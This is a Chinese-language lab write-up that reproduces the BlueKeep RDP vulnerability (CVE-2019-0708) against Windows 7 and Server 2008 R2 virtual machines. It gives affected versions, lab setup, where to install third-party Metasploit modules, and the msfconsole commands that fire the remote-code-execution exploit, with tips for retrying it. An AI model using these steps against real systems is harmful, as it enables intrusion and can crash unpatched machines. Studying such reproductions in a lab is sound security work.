0x00 前言

每次复现都会遇到各种各样的问题,这次也不例外,经过多次尝试才复现成功,因此把可能的解决方法也和大家分享一下,有想要一起复现学习/投稿的可以联系我哈

0x01 影响版本

Windows 7

Windows Server 2008 R2

Windows Server 2008

Windows 2003

Windows XP

Windows 8和Windows 10及之后版本的用户不受此漏洞影响

0x02 环境搭建

环境下载链接:

win7 sp1:ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

win08 R2:ed2k://|file|cn_windows_server_2008_r2_standard_enterprise_datacenter_and_web_with_sp1_vl_build_x64_dvd_617396.iso|3368962048|7C210CAC37A05F459758BCC1F4478F9E|/

本次环境:

win7 sp1 - 192.168.10.10

win08 R2 - 192.168.10.6

kali - 192.168.10.9

win7 sp1 准备:

开启3389

win08 R2准备:

开启3389

修改注册表

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Winstations\RDP-Tcp\fDisableCam = 0

kali 准备:

将以下链接中的4个文件分别放至相应的目录(kali默认目录)

https://github.com/TinToSer/bluekeep-exploit

rdp.rb --> /usr/share/metasploit-framework/lib/msf/core/exploit/

rdp_scanner.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cve_2019_0708_bluekeep.rb --> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/

cve_2019_0708_bluekeep_rce.rb --> /usr/share/metasploit-framework/modules/exploits/windows/rdp/

0x03 漏洞利用

msfconsole

reload_all

search 2019_0708

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhost 192.168.10.10

set rport 3389

set target 3

run

win08 R2也是同样的操作命令

msfconsole

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

set rhost 192.168.10.6

set rport 3389

set target 3

run

复现失败的一些小tip:

1、确认目录下已经拷贝了相应文件

2、确认3389开启,msf中reload_all执行

3、kali的内存略微给大一点

4、多run几次!(重点)

小结:目前exp还很不稳定,建议大家在实战中暂时不要使用,如果打蓝屏可能会造成很严重的后果。复现时可能会出现诸多问题,但是只要耐心地多尝试几次总会成功的

图形化检测工具下载Timeline Sec公众号回复0708

参考链接:

http://www.nmd5.com/?p=409#comment-46

https://github.com/rapid7/metasploit-framework/pull/12283

最新文章

  1. owner:轻松管理java项目配置
  2. gRPC源码分析2-Server的建立
  3. Error Domain=NSURLErrorDomain Code=-999 “The operation couldn’t be completed.
  4. Android守护进程
  5. 微软MVP衣明志告诉你,小白全方位攻略,逆袭互联网达人
  6. 2016 - 1 - 25 CSS初步 (二)
  7. 通过Spark SQL关联查询两个HDFS上的文件操作
  8. MYSQL-5.5二进制包安装
  9. js只需5分钟创建一个跨三大平台纯原生APP
  10. note.js之 Mongodb在Nodejs上的配置及session会话机制的实现
  11. mybatis 简单配置
  12. Nodejs密集型CPU解决方案
  13. [ZJOI2006]超级麻将
  14. SpringBoot 上传文件夹
  15. Linux基础入门-用户及文件权限管理
  16. window注册表相关
  17. Shell中判断语句if中-z至-d的意思
  18. 2017第45周一java多线程创建方法
  19. Java的常用命令javac与java
  20. MyBatis空where拦截器

热门文章

  1. Docker 运行ES和Kibana
  2. spark org.apache.spark.ml.linalg.DenseVector cannot be cast to org.apache.spark.ml.linalg.SparseVector
  3. php 回调函数结合闭包(匿名函数)的使用示例
  4. PHP设计模式 - 中介者模式
  5. [转帖]插曲:大白话带你认识Kafka
  6. C++ Primer 第五版示例gcc源码
  7. emmet css 缩写
  8. golang --Converting and Checking Types
  9. N皇后问题的python实现
  10. 高并发场景下System.currentTimeMillis()的性能问题的优化